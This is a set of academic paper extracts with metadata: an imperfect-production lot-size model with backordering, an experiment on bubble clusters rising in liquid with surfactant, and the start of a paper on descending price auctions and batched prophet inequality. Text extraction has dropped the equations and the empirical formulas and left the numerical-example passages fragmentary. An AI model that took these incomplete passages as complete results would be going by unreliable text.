has presented the investment model with respect to repetitive inspections and measurement equipment in imperfect production process. Sana et al. (2007a) have extended an EPLS (Economic Production Lot size) model which accounts for production system producing items of perfect as well as imperfect quality. The probability of imperfect quality items increases with increase of production-run-time because of machinery problems, impatience of labor staff and improper distribution of raw materials. They have assumed that the demand rate of perfect quality items is constant whereas the demand rate of defective items which are not repaired is a function of reduction rate. In another model, Sana et al. (2007b) have developed a volume flexible inventory model with an imperfect production system where demand rate of conforming quality items is a random variable and the demand rate of defective items is a function of a random variable and reduction rate. Giri and Dohi (2007) have studied a problem inspection scheduling in an imperfect production process in which the manufacturing process may shift from 'in-control' state to an 'out-of-control' state. The shift time follows an arbitrary probability distribution with increasing hazard (failure) rate and the products are sold with a free minimal repair warranty. The inspection process monitors the production process which in turn reduces the number of imperfect quality products. Liao (2007) has investigated an imperfect production process that requires production corrections and imperfect maintenance. Two states of production process are occur, namely state I (outof-control state) and state II (in-control state). In 'out-ofcontrol' state, the product is not perfect and a part is rejected (reworking is impossible) with a probability 'q'. The product is perfect (good quality) with a probability '(1-q)'. The mean loss cost due to reproduction through production correction per total expected cost until the N+1 'out-of-control' states are entered successively is determined. Lo et al. (2007) have extended a production-inventory model in aspect of both the manufacturer and the retailer. They have assumed a varying rate of deterioration, partial back-ordering, inflation, imperfect production process and multiple deliveries. The elapsed time for the production process shift to imperfect production is assumed to be exponential distribution (same as Khouja and Mehrez, 1994). Panda et al. (2008) have modeled an Economic Production Lot size model for imperfect items in which production rate is considered as fixed quantity and the demand rate is probabilistic under certain budget and shortage constraints. They also have assumed that the percentage of defective items is stochastic and the natures of uncertainty in the constraints are stochastic or fuzzy. In this case, the percentage of defective item is independent of production rate and production-run-time. Lee (2008) has developed a maintenance model in multi-level multi-stage system. According to his model, the investment in preventive maintenance is to reduce the variance and the deviation of the mean from the target value of the quality characteristics that reduce the proportion of defectives also to increase reliability of the product. The proportion of defectives can be linked to the cost of manufacturing, cost of inventory, and loss of profit. The total costs in this model include the cost of manufacturing, setup cost, holding cost, loss of profit and warranty cost.
In most EOQ (Economic Order Quantity) model, the assumption is that 100% of produced units are of good (perfect) quality. This unrealistic assumption may not be valid for any production environment. Schwaller (1988) has presented a procedure that extends EOQ models by adding the assumptions that defectives of a known proportion are present in incoming lots and that fixed and variable inspection costs are incurred in finding and removing the items. Zhang and Gerchak (1990) have considered a joint lot sizing and inspection policy studied under an EOQ model where a random proportion of units are defective. These defectives cannot be used and thus must be replaced by nondefective ones. Khouja and Mehrez (1994) have developed an EPLS with imperfect quality. They have taken the percentage of defective items as a product of production rate and production run time. Salameh and Jaber (2000) have developed an economic production/inventory quantity model for items with imperfect quality. They have assumed that poor quality items are sold as a single batch at the end of 100% screening process. Hayek simple expressions for the expected profit per unit time and the optimal order quantity. Khouja and Mehrez (1994), Chung and Hou (2003) and some other researchers have used a function for percentage of defective items as a product of production rate and production run time. Sana (2010) has assumed the percentage of defective items varies non-linearly with production rate and production-run-time.
All of the above-mentioned models assume that shortages are not permitted to occur. Nevertheless, in many practical situations, stock out is unavoidable due to various uncertainties. Therefore, the occurrence of shortage in inventory is a natural phenomenon. The main purpose of this paper is to generalize Sana (2010) to assume the shortage is allowed. In addition in this paper we consider unit production cost dependent selling price as it is very much important for many realistic practical situations. Also in this study we consider screening cost of the item during production process as it should not be neglected.
It starts with shortage. After a certain time, the production starts with a variable production rate up to an optimal time. During production-run-time, the manufacturing process may shift to an 'out-of-control' state after certain time that follows exponential distribution function. In 'out-of-control' state, a percent of produced items are defective. The defective items are reworked immediately at a cost. Then, I have formulated a profit function, and maximized it by considering the production lot size and production rate as decision variables.
The paper is organized as follows: Section 2 presents fundamental assumptions and notation. Section 3 formulates the model. Section 4 provides numerical examples. Sensitivity analysis is discussed in Section 5. Section 6 concludes the paper.
Fundamental Assumptions and Notations
The following assumptions and notations are considered to develop the model: Assumptions 1) At the starts of each production cycle, the production process is always in an in-control state and perfect items are produced. 2) The production process shifts from the in-control state to an out-control state. During out-control state imperfect quality items are produced and these are reworked at a cost immediately 3) An elapsed time until shift is arbitrarily distributed with mean and variance. 4) the rate of production and lot size are decision variables 5) lead time is zero 6) shortage is completely backordered 7) the model is developed for a single item Here total lot size is Q. so the production is 2 3 t t = Q/P. in the mode, production process is so adjusted that the produced items at the beginning of the production are of conforming quality up to a certain time (> 1 2 t t ) (i.e. in control state). After which the production process shifts to an out-control state. In out-control state; some of the produced items are of non-conforming quality. The production rate of defective items is (t,, P) percent of production rate P. here (t, , P) is defined as The exponential distribution has often been used to describe the elapsed time to failure if many components of the machinery system. The mean time to failure is decreasing function of P. therefore, the expected number of defective items in a production lot size Q is The shortage cost during time 1 Thus the shortage cost during the time 2 The average inventory during time 3 The total inventory cost for a cycle of length T is given by
Numerical Examples
Ex Indicates optimal solution, nc indicates no change solution, ICinventory cost, RCrework cost, SCsetup cost.
Sensitivity Analysis
From the sensitivity analysis of the Examples 1 (see Tables 1); it is observed that the optimal production rate P , lot- Parameters changes (in %) decrease with increases in g. It is quite natural that optimal production rate is higher for higher labour/energy costs, keeping in mind the cost minimization of production cost.
As production rate increases lot-size Q automatically increases that results in higher inventory cost. Here, the change of production rate compared to the lot-size is higher. It provides lower production-run-time. Consequently, total rework cost and setup cost are higher in spite of higher production rate. 2. With increases in tool/die costs, optimum production rate decreases obviously that results in lower lot size and inventory cost. It is also obvious that lower production rate and lot-size reduce total rework cost and setup cost. And, lower production rate causes higher unit production cost.
3. The production rate increases and lot-size decreases with increases in . Smaller lot-size causes lower inventory cost and higher setup cost as total demand is fixed. Higher production rate produces more defective items that results in higher rework cost.
4. P , RC , SC increase and Q , IC and E decrease with increases in R. Although the production-run time decreases with increases in R, the number of defective items is higher due to higher production rate that results in higher rework cost. Also, lower lot-size reduces the inventory cost and setup cost.
Conclusion
In this paper, we propose a generalized production lot size model with backordering. Our model extends the approach by Sana (2010) to consider permissible shortage backordering. We have maintained the originality of the model of Sana (2010) as he described that given the ongoing addition of new technology, the introduction of more robotics and automation, the increasing use of computeraided devices, etc., 'out-of-control' state is likely to be even higher with higher production rate. During 'out-of-control' state, the process starts to produce defective items. As the rate of production increases, the defective items are more produced. Generally speaking, the probability of defective items increases with increase of production-run-time because of machinery problems, impatience of labor staff and improper distribution of raw materials. Also, in long-run production process, the percentage of defective items increases with both the increase of production rate and production-run time. In this point of view, I have considered the rate of production of defective items (percentage of total production) is a nonlinear function of both production rate and production-run time. The probability distribution of shift time from 'in-control' state to an 'out-of-control' state follows an exponential distribution function with mean 1=f(P), where f(P) is an increasing function of P. In the existing literature, everybody considers this percentage is a fixed constant throughout the production cycle. The defective items are reworked at a cost in a separate cell to restore its original quality. The reworking cost is measured by wasted materials, labor, equipment time and other resources. We have described the final results of Sana (2010) model as a particular case (Special case 2). We have used some things like shortage, unit production cost dependent selling price, and screening cost and found the optimal values of total cost and other costs in this situation. We have also determined the time period for different stage like shortage period, backlogging period, production run time, only demand period and total cycle time. I have obtained an optimal lot-size and production rate, solving by numerical techniques. And, the features of key parameters are studied in sensitivity analysis section. | 2018-10-16T16:33:57.830Z | 2016-01-01T00:00:00.000 | {
"year": 2016,
"sha1": "9ce42f49d6e43cd8725bedc1fe9b9708a4e1f9dc",
"oa_license": null,
"oa_url": "https://doi.org/10.21275/v5i2.15021603",
"oa_status": "GOLD",
"pdf_src": "MergedPDFExtraction",
"pdf_hash": "1963e4629c275d4502a8c88b145b63b030abcfeb",
"s2fieldsofstudy": [
"Business",
"Economics"
],
"extfieldsofstudy": []
} |
105742565 | pes2o/s2orc | v3-fos-license | An experimental study of the dynamics of ascent of the bubble system in the presence of a surfactant
. This paper presents investigations on the new experimental setup for obtaining a compact cluster of monodisperse bubbles of a given diameter is presented. Also we provided the results of experimental study of the bubble cluster floating-up in the presence of a surfactant in a wide range of Reynolds numbers. There was held a comparison of the dynamics of the floating-up of a monodisperse bubble cluster in a glycerol medium and in the medium glycerin supplemented with a surfactant.
Introduction
The behavior of fluid containing bubbles is distinctly different from behavior of homogeneous fluids under different physical and physical-chemical influence. These differences are abundantly used in industryboiling, heat transfer in the two-phase mediums, cavitation, foaming, flotation. There is a question of the bubble cluster of given size generation in a number of problems, in particular, while researching an ignition of fluid electric discharge in fluids by way of specially created cavitational bubbles [1], while researching surfactants and acoustic waves on dynamics of bubble clusters [2,3].
When two-phase flows with deformable particles of the disperse phase (liquid-drop, bubble flows) move, an important role is played by the properties of the interface, in particular, the surface tension coefficient. One of the physical factors affecting the boundary conditions is the presence of surfactants, which can change the criterial dependencies for the motion of the particle of the disperse phase by an order of magnitude. On the free boundary of a bubble or a droplet moving in a liquid medium with a surfactant, Marangoni tangential capillary forces arise, contributing to an increase in the coefficient of resistance of the particle. The problems arising in studying the patterns of motion and deformation of bubbles (or droplets) in a liquid containing a surfactant are formulated in the works [4,5].
The regularities of the motion of bubbles in the presence of surfactants were investigated mainly for a single bubble [6,7]. In contrast to the known papers, the results of an experimental study of the dynamics of the ascent of a set of spherical air bubbles in the presence of surface active substances in the Reynolds number range are presented Re=0.001÷30. There was held a generalizing the data on the coefficient of resistance of a
The scheme of the experimental setup
An experimental setup for studying the dynamics of the emergence of a cluster of monodisperse bubbles in the presence of surfactants is shown in Fig. 1. The experimental setup comprises a reservoir 1 with a liquid located in the lower part, where air bubbles were produced by device 2, connected by a tube 4 to a compressed air reservoir 5, the pressure of which is supplied to the device 2 through a microreducer 6 with a control manometer 7 and a reducer 8. In addition, there is a separate container 9 connected to the tube 4 through a reducer 10 and a tee 11 designed to create a positive pressure preventing the working fluid from flowing into the device 2. The device for obtaining a monodisperse cluster of bubbles 2 is made in the form of a collector with perforations in the top cover starting from the center and along equidistant concentric circles, which makes it possible to obtain an axisymmetric bubble cluster. The use of microtubules of identical diameter 13, installed in perforations, provides the formation of monodisperse bubbles. Microtubes of the same height, located along each of the concentric circles, provide simultaneous formation of a "ring" of bubbles for each of the circles. The linear decrease in the height of the microtubes located on the circles, with an increase in the radius of the circle, ensures the sequential formation of each "ring" of bubbles with the same delay in time as they move away from the center of the collector cover, which makes it possible to obtain a compact cluster with a uniform spatial distribution of bubbles.
Results of the experimental study
During the experimental studies, the number of bubbles n = (1 ÷ 69) and their diameters D = (3 ÷ 7) mm in a monodisperse cluster varied, as well as the spatial arrangement of the bubbles among themselves [8]. Were used as a liquid: distilled water, water-glycerol solutions; as a surfactant: sodium dodecyl sulfate, potassium stearate.
The results of the visualization were given in a coordinate format for further analysis. In Fig. 2 shows a typical view of the spatial arrangement of bubbles at different times of ascent (n=5, D=3.9 mm).
Fig. 2.
Coordinates of the location of bubbles at different times (t = 0, 9.5 s).
The results of the experimental investigation for the emergence of a single bubble (n = 1) in the presence of surfactant are consistent with the results of known works on this topic and show that the bubble regime changes. The new bubble rise regime corresponds to the motion of a solid particle -the Stokes law at Reynolds numbers Re < 1 and the Klyachko law for Re > 1. Fig. 3. Dependence of the resistance coefficient of a group of bubbles as a function of the Reynolds number (1 is the Stokes dependence; 2 is the empirical dependence, with the surfactant; 3 is the Hadamard-Rybczynski dependence; 4 is the empirical dependence, without surfactant).
To assess the effect of the presence of surfactant in a liquid on the dynamics of the ascent of a group of bubbles, two series of experiments were carried out: in a pure liquid (without surfactant) and in the presence of a surfactant (Fig. 3).
In experiments on the ascent of a group of bubbles in glycerin without surfactant additives, a value of a volume concentration C > 0.002 corresponding to the onset of the Matec Web of Conferences "partially blown" cloud. An empirical dependence is obtained for the coefficient of resistance of a group of bubbles CD, moving in glycerine without surfactant additives in the Re <1 region (curve 4 in Fig. 3):
Re
The empirical dependence for the coefficient of resistance of a group of bubbles popping up in glycerin with the addition of surfactant has the form (curve 2 in Fig. 3):
Re
It was found that the effect of surfactants on the dynamics of bubble emergence is determined by the Reynolds number. When Re <1, the bubble surfacing regime change occurs at a lower concentration than at Re> 1.
Conclusion
There is a certain critical value of the surfactant concentration in the liquid, at which the ascent bubble regime changes. In this case, the critical concentration value is a function of the bubble size (with increasing bubble size, the critical concentration value increases).
The presence of surfactant leads to an increase in the coefficient of resistance by 33% and, accordingly, to a decrease in the ascent rate of a single bubble. In this case, the law of resistance changes from the Hadamard-Rybczynski formula to the Stokes formula.
Empirical relationships for the coefficient of resistance of a group of bubbles ascent up in a liquid with a surfactant and without a surfactant are received.
A decrease in the ascent rate of a group of bubbles in a liquid containing a surfactant has been found, compared with the velocity of a group of bubbles in a pure liquid.
This study was supported by the Russian Science Foundation (Project No. 15-19-10014). | 2019-04-10T13:11:48.810Z | 2018-01-01T00:00:00.000 | {
"year": 2018,
"sha1": "f1db682c9467f81ade55fde1ef1bf4b7dcdb40bc",
"oa_license": "CCBY",
"oa_url": "https://www.matec-conferences.org/articles/matecconf/pdf/2018/53/matecconf_hmttsc2018_01002.pdf",
"oa_status": "GOLD",
"pdf_src": "Adhoc",
"pdf_hash": "1980ee036d33da47233e658e60257a586778ebed",
"s2fieldsofstudy": [
"Engineering",
"Chemistry",
"Physics"
],
"extfieldsofstudy": [
"Materials Science"
]
} |
247222724 | pes2o/s2orc | v3-fos-license | Descending Price Auctions with Bounded Number of Price Levels and Batched Prophet Inequality
We consider descending price auctions for selling $m$ units of a good to unit demand i.i.d. buyers where there is an exogenous bound of $k$ on the number of price levels the auction clock can take. The auctioneer's problem is to choose price levels $p_1>p_2>\cdots>p_{k}$ for the auction clock such that auction expected revenue is maximized. The prices levels are announced prior to the auction. We reduce this problem to a new variant of prophet inequality, which we call \emph{batched prophet inequality}, where a decision-maker chooses $k$ (decreasing) thresholds and then sequentially collects rewards (up to $m$) that are above the thresholds with ties broken uniformly at random. For the special case of $m=1$ (i.e., selling a single item), we show that the resulting descending auction with $k$ price levels achieves $1- 1/e^k$ of the unrestricted (without the bound of $k$) optimal revenue. That means a descending auction with just 4 price levels can achieve more than 98\% of the optimal revenue. We then extend our results for $m>1$ and provide a closed-form bound on the competitive ratio of our auction as a function of the number of units $m$ and the number of price levels $k$.
Introduction
The descending price auction (DPA) is strategically equivalent to the celebrated first price auction, a powerful machinery in auction design that has passed the test of time in the history of practical auctions [Milgrom, 2004]. In a stark contrast to posted pricing mechanisms, this auction induces competition among the buyers. This competition in turn helps with increasing the generated revenue -to the extent that in a symmetric independent private value setting for selling a single item this auction (with an appropriate reserve price) is revenue optimal. While there are other auction formats, such as the second price auction, that induce competition and enjoy similar revenue benefits compared to DPA, there is a long list of reasons why DPA is more practically appealing: 1 pay-as-bid is a simple, transparent, and interpretable rule, and makes the auctioneer more credible as descending price auctions are "automatically self-policing" Vickrey [1961], Akbarpour and Li [2020]. Furthermore, buyers reveal the minimum information about their private valuations in DPA compared to other auction formats. The major disadvantage of DPA, as with other clock auctions, is its requirement of many rounds of communication between the auctioneer and the buyers.
Another simple and highly prevalent selling mechanism in practice is posted pricing. Notably, posted pricing requires the minimum communication between the auctioneer and the buyers and reveals even less information about the buyers valuations than DPA, and is even a simpler mechanism in many ways. At the same time, it can be perceived as a special case of DPA with a single price level. As a result, it enjoys almost all other practical appeals of DPA such as transparency and credibility; however, its performance is not optimal (both in terms of revenue and welfare) due to the lack of competition among the buyers.
The above paradigm motivates us to study the impact of having a constraint on the number of rounds of DPA and to evaluate how this constraint changes the competition, and hence the revenue/welfare performance of the resulting mechanism.
To this end, we consider the class of descending price auctions with a bounded number of price levels. In this new auction format, the auctioneer commits to a distinct set of k ∈ N prices p 1 > p 2 > . . . > p k for an exogenously specified k. During each round i ∈ [k] of the auction, the remaining supply is offered for sale at price p i to all interested buyers in a random order. All sales are private and not revealed to other buyers. The auction terminates once all units are sold or at the end of round k whichever happens first. This auction interpolates between the descending price auction with a reserve price, which can achieve the optimal revenue, and anonymous posted pricing, which is sub-optimal in general. We then ask the following design questions: By using at most k distinct price levels, how well can a k-level descending price auction approximate the optimal mechanism? Is there a simple sequence of k prices that can approximate the optimal mechanism in a parametric fashion?
In this paper, we answer these questions in affirmative. In particular, we consider a general setting with multiple unit-demand symmetric buyers with independent private values and multiple identical items. We then show how to design a simple sequence of prices to approximate the optimal mechanism. We also quantify the extent of the approximation as a function of the number of price levels. Interestingly, we show that the revenue of a k-level DPA with properly designed prices converges to the optimal revenue exponentially fast as k goes to infinity. This result greatly extends the applicability of descending price auctions with bounded number of price levels, as the optimal mechanism is very well approximated by using this class of mechanisms, even for small values of k. We also obtain similar results for the welfare objective through a different sequence of prices.
Main Contribution
We start by formulating the descending price auction with k price levels. In this problem, there are n ≥ 1 unit-demand buyers whose values are drawn i.i.d. from a known distribution, and an auctioneer who sells m units of a good. The auctioneer announces a sequence of k (decreasing) prices and then, after observing their values, buyers decide about their bid (from this set of prices).
The auctioneer then goes over the prices in a decreasing order over k rounds. If the bid of multiple buyers are equal to the posted price in a round, the (remaining) items go to a subset of them chosen uniformly at random. Finally, the auctioneer charges each winning buyer with her submitted bid.
After establishing the existence of a (symmetric) Bayes-Nash equilibrium for buyers and characterizing its properties, we turn to our main question: what is the revenue approximation factor of a descending price auction with k posted prices in selling m ∈ N items. The mathematical definition of approximation in this paper is a standard one from the design and analysis of algorithms and mechanisms (see, e.g., Hartline [2012]). For Γ ∈ [0, 1], a k-DPA is a Γ-approximation for the setting with m items and multiple buyers with i.i.d. values if for all instances of this problem the performance, i.e., the expected revenue, of k-DPA is within a multiplicative Γ fraction of the performance of the optimal mechanism for that instance.
To guide the analysis, we introduce a new class of prophet inequality [Krengel andSucheston, 1978, Samuel-Cahn, 1984], and refer to it as the batched prophet inequality. In this new problem, all random rewards are drawn at time 0. The decision-maker decides about k different thresholds for k rounds and can take m rewards. At each round if all the rewards are below that round's threshold, the game advances to the next round. Otherwise, the decision-maker wins all of the rewards that has passed the threshold. If the number of the rewards above the threshold is larger than the remaining number of rewards (out of m) that the decision-maker can take, then she only collect a subset of these rewards to fill her capacity m, breaking ties in this selection uniformly at random. The game proceeds until the decision-maker selects m rewards or after k rounds. The goal of the decision-maker is to choose k thresholds such that the expected value of the collected rewards is a good approximation of the expected value of the sum of top m rewards (i.e., the expected reward when all the variables are known).
Our first main result, stated next, proves a reduction form the revenue approximation problem for k-DPA to the batched prophet inequality problem.
Main Result 1 (informal):
Any algorithm for the batched prophet inequality with k rounds and capacity m that achieves Γ(k, m) approximation of the expected sum of top m rewards can be used to generate a sequence of k prices for the k-DPA whose expected revenue is Γ(k, m) approximation of the optimal expected revenue for selling m items.
Building on this result, we then develop the analysis of the batched prophet inequality for m = 1 item and m > 1 items separately as they require different techniques. The following summarizes our result for a single item.
Main Result 2 (informal):
There exists a sequence of k thresholds that achieves 1 − 1/e k of the optimal expected reward for the batched prophet inequality. This implies the existence of k prices, so that their corresponding k-DPA achieves 1 − 1/e k of the optimal revenue.
The main idea of the proof is to construct a sequence of prices that balances the tradeoff between having a high revenue from the current round (by selecting a large threshold in the batched prophet problem) and having a high probability for collecting future rewards (by selecting a small threshold in the batched prophet problem). There are two points worth mentioning. First, we provide an algorithm that explicitly finds the sequence of thresholds that achieves the competitive ratio 1 − 1/e k for the batched prophet inequality. Second, we also explicitly characterize the sequence of prices for k-DPA that achieves 1 − 1/e k of the optimal revenue. Third, our approximation factor for the batched prophet inequality is optimal for k = 1. In particular, for k = 1, our batched prophet inequality becomes identical to the classic prophet inequality for i.i.d. rewards (or the homogeneous prophet secretary problem) with a static policy: the sequence of random variables arrive at a random order and the decision-maker selects the first reward that is above a static threshold. This problem has been studied in Correa et al. [2017], Ehsani et al. [2018], and Lee and Singla [2018], where the authors establish the existence of a distribution for rewards such that no single threshold policy can achieve better than 1 − 1/e of the optimal expected reward. 2 We then consider the generalization of our setting to selling multiple items (i.e., m > 1).
Again, we first prove that the problem of approximating the optimal revenue reduces to a batched prophet inequality in which the decision-maker can acquire up to m rewards. We then provide an algorithm for approximating the optimal expected reward in the batched prophet inequality. The following summarizes our result for multiple items.
Main Result 3 (informal):
For any ǫ > 0, there exists a sequence of k thresholds that achieves of the optimal expected reward for the batched prophet inequality when the number of awards (corresponding to buyers) is large enough. This implies the existence of k prices, so that their corresponding k-DPA achieves the same approximation of the optimal revenue.
Again, a noteworthy point is that our approximation factor for the batched prophet inequality with m > 1 items is also optimal for k = 1. In particular, for k = 1 and m > 1, our batched prophet inequality problem becomes identical to the prophet inequality for i.i.d. rewards (or the homogeneous prophet secretary problem) with a static policy when the decision-maker can collect m rewards. This problem has been studied in Yan [2011] and Arnosti and Ma [2021], where the authors establish the existence of a distribution for rewards such that no single threshold policy can achieve better than 1 − e −m m m m! of the optimal expected reward, and show this approximation factor can be achieved by a single threshold. As a side note, our analysis for the setting with multiple items can be viewed as an extension of the results of Arnosti and Ma [2021] to any k > 1 by using a different, and arguably simpler, analysis.
Our main focus is on approximating the optimal revenue. However, we show that our analysis provides the above approximations for the optimal welfare as well.
Further Related Literature
Besides the papers discussed earlier in the introduction, our paper is related to the vast literature on Bayesian mechanism design in computer science, economics, and operations. We sketch some of these connections below.
Simple vs. optimal Our paper relates to the literature that studies simple mechanisms that approximates the optimal mechanism; Representative papers are Chawla et al. [2007], Hartline and Roughgarden and study other variants of (sequential) posted pricing under a variety of assumptions on the underlying value distributions. In particular, Chawla et al. [2007] consider a unit-demand multidimensional screening problem and identify a simple item pricing that is approximately optimal and Alaei et al. [2019] proves that an anonymous posted price can achieve 1/e of the optimal auction for regular, independent, and non-identical values (see also Hartline [2012] for a survey of earlier works in this literature). We depart from this literature by stepping away from posted pricing and studying the performance of a descending clock auction with multiple price levels. As we establish in the paper, both our analysis and results are different from the above papers.
First price/descending clock auctions with discrete bids/price levels On one extreme of our auction formats, we have anonymous posted pricing whose (sub)optimality has been extensively studied in the literature, as mentioned earlier. On the other extreme, and more closely to ours, are Chwe [1989] and Hörner and Samuelson [2011] that consider first price auction with discrete bids and prove that when the distribution of the underlying values is uniform and the discrete bids (over time) are multiples of an increment, as the number of discrete bids goes to infinity the auctioneer's revenue converges to the optimal revenue. Our paper considers the interpolation between these two extremes and aims to understand the performance guarantee of a descending price auction with multiple posted prices. In particular, we depart from these papers by asking the following question: what is the "best" approximation that the auctioneer can achieve by considering k discrete bids (that are not restricted to be multiples of an increment)? By building connections to the batched prophet inequality problem, we establish that, for general distributions, by properly choosing the sequence of discrete bids the auctioneer's revenue converges exponentially fast to the optimal revenue and we characterize its parametric convergence rate in terms of the number of price levels and items.
Another work that is related to ours in spirit is Nguyen and Sandholm [2014]. They consider a framework for optimizing prices in a multi-item descending clock auction, when auctioneer is a buyer and selecting sellers providing different items within a feasibility constraint, in order to minimize expected payment. Our work diverges from this paper as we consider a different setting and objective (optimizing prices under feasibility vs. approximation ratio analysis with respect to optimal auction); however, the percentile-based price decrements has the same flavor as our price trajectories in Section 3.3.
Prophet inequality Our paper also relates to the rich literature on prophet inequality. In the vanilla version of this problem, a decision-maker sequentially observes rewards drawn independently from known distributions, and decides when to stop and take the reward to maximize her expected collected reward. Prophet inequality was first introduced and analyzed in Krengel and Sucheston [1978], Hill and Kertz [1982], and Samuel-Cahn [1984] and further developed in Babaioff et al. [2007], Kleinberg and Weinberg [2012], Azar et al. [2014], Dutting et al. Organization: The rest of the paper proceeds as follows. In Section 2, we present our problem formulation and formally define descending price auction with k price levels (which we call k-DPA).
We then introduce batched prophet inequality and prove that k-DPA reduces to it. In Section 3, we consider batched prophet inequality with a single item and prove that the decision-maker can achieve 1 − 1/e k of the optimal expected reward. We then use this solution to design a k-DPA with the same approximation factor for the optimal expected revenue. In Section 4, we extend our analysis of the batched prophet inequality and k-DPA to a setting with multiple items. Section 5 concludes, while the Appendix presents the omitted proofs from the text.
Problem Formulation, Equilibrium, and Reduction
We start by formalizing our setting (Section 2.1) and revenue maximization problem (Section 2.2).
We then characterize the equilibrium behaviour of the buyers (Section 2.3) and show how our problem reduces to a variant of the prophet inequality problem (Section 2.4).
The Environment
We consider a symmetric single-parameter Bayesian mechanism design setting, in which an auctioneer is selling one or multiple units of the same item to n unit-demand buyers -represented by the set N = {1, 2, . . . , n} -to maximize the expected revenue. We rely on standard definitions, solution concepts, and results in Myerson's theory on the design of optimal single-parameter auctions [Myerson, 1981], e.g., see Chapter 3 of Hartline [2013]. In particular, we assume buyers' utilities are quasi-linear, meaning that given the value v from receiving the item and a payment p, the buyer's utility is v − p. We assume buyers' private values v = (v 1 , v 2 , . . . , v n ) for the item are non-negative and drawn i.i.d. from a known common prior distribution with a commutative distribution function (CDF) G : R ≥0 → [0, 1], and this distribution admits a probability density function (PDF) g : R ≥0 → [0, 1]. For simplicity of technical exposition, we further assume this distribution is atom-less and hence G is continuous. 3 Given a buyer's value distribution, the Myerson's virtual value function is defined as . We restrict our attentions to regular distributions for which the virtual value function is weakly-increasing. 4 The auctioneer is interested in running a k-level descending price auction (k-DPA) to maximize her expected revenue. This auction, formally defined below, is basically a descending price (clock) auction when the price levels, and therefore the bid of buyers, are restricted to a finite set of cardinality k.
Definition 1 (k-DPA). Given a finite set of distinct price levels (also referred to as bids) P = {p 1 , p 2 , . . . , p k }, where p 1 > p 2 > . . . > p k , its corresponding m-unit k-descending price auction for m ∈ N is the following mechanism: • Ask each buyer i to place a bid b i ∈ P ∪ {0} after observing her private value v i ∼ G, 5 • Select the set of winners by greedily picking the top m submitted bids (and breaking the ties uniformly at random), • Charge each buyer i in the winner set with her submitted bid b i .
As a remark, k-DPA with k = 1 is basically an anonymous pricing mechanism with a randomized tie-breaking rule. Also, when k = +∞ and P = [p, +∞), this auction boils down to ordinary descending price auction with an anonymous reserve price of p. In this case, by setting p = φ G −1 (0), we can recover the Myerson's optimal auction.
Importantly, an alternative interpretation of the above mechanism is basically a sequential pricing when the buyers are flexible to decide on their purchase round: in such a setting, n i.i.d.
buyers arrive at round 0 and the seller posts a (decreasing) sequence of prices p = (p 1 , . . . , p k ) to sell m items over a finite horizon of k discrete rounds 1, . . . , k. Now each buyer i, given her value v i , decides when to purchase the item (if any). The game starts at round 1.
all the units of the item have not been sold so far, the buyers who have decided to purchase at price p j have a chance to receive one unit of the item at this price (when the ties are broken uniformly at random if there is more than one buyer interested in the last unit of the item). If there is still some unsold units of the item at the end of this round, the game advances to the next round j + 1. In this alternative interpretation of our setting, the buyers only interact with the auctioneer (in at most k rounds) and do not observe the number of sold items. This assumption is particularly relevant for settings in which the buyers and the auctioneer privately/remotely interact with each other.
Auctioneer's Problem
The auctioneer's objective is to maximize her expected revenue by choosing the price sequence p 1 > . . . > p k , taking into account the buyers' strategies at equilibrium. In particular, once prices are fixed, the buyers play a game of incomplete information, in which each buyer's strategy is a bid function that maps her private value to one of the possible prices (or a distribution over the possible prices for mixed strategies). We evaluate the expected revenue of the resulting k-DPA under a Bayes-Nash equilibrium (BNE) of this game. The equilibrium selection (and uniqueness) will be detailed later in Section 2.3.
Given the realized values v, by abuse of notation, we denote by REV-ALG G (v, p) 5 Bidding bi = 0 is always a possibility to guarantee the individual rationality of our auctions.
the revenue of the k-DPA with prices p at a particular BNE when buyers' values are drawn i.i.d.
from a common prior distribution G. We also denote by the revenue of the optimal direct mechanism when buyers' values are drawn i.i.d. from a common prior distribution G. From Myerson [1981], the optimal mechanism maximizes the virtual welfare for regular distributions, and hence In particular, when m = 1, as a benchmark, we are interested in studying the worst-case revenue approximation ratio of the best k-DPA against this benchmark, given by Given the auctioneer's objective, our main goal is to establish a lower bound on Γ(k), ideally through a simple and interpretable sequence of bid levels/prices, and study how fast the expected revenue of the best k-DPA converges to Myerson's optimal revenue. We start our analysis by considering a seller with a single unit of the item (hence m = 1) and extend the results to a setting with multiple units in Section 4.
The Buyers' Bayes-Nash Equilibrium Characterization
Considering k-DPA with i.i.d. buyers as a symmetric game of incomplete information, in the same spirit as the ordinary descending price auction with i.i.d. buyers, we will focus our attention on Bayes-Nash equilibria in which buyers use symmetric strategies; This means a buyer's strategy depends on her valuation, not on her identity. Therefore, the symmetric BNE strategy can be represented by a single bidding function b * : R ≥0 → P that maps each realized value v to one of the possible prices in P. Note that our restriction to symmetric BNE is really not a restriction: k-DPA belongs to the class of symmetric rank-based auctions studied in Chawla and Hartline [2013]. As established in this paper, when buyers' values are i.i.d., any auction in this class has a unique Bayes-Nash equilibrium. Moreover, this equilibrium is symmetric. We next characterize this unique symmetric BNE strategy b * (v).
Given the decreasing sequence of prices p 1 > . . . > p k as possible price levels, a buyer with realized value v chooses an optimal stopping round j (if any) along this sequence by bidding the price p j corresponding to that round, taking as given the strategies of other buyers (at the equilibrium).
As a result, in the sequential pricing interpretation of k-DPA, such a buyer rejects all prices p j ′ for j ′ < j and accepts the price p j . If the item is unsold before round j, a uniform random buyer among those who have accepted price p j wins the item.
First, intuitively speaking, higher-valuation buyers are more anxious to purchase than lowervaluation buyers, and hence buyers with higher valuations accept earlier. As a result, b * (v) should have the form of a monotone increasing step function with discontinuities at certain thresholds τ 1 ≥ τ 2 ≥ . . . ≥ τ k > 0, and hence buyers' equilibrium can be represented by this sequence of thresholds. Second, we can actually provide an explicit relationship between the sequence of prices p = (p 1 , . . . , p k ) and the sequence of equilibrium thresholds τ = (τ 1 , . . . , τ k ), which gives us our desired characterization of the symmetric BNE.
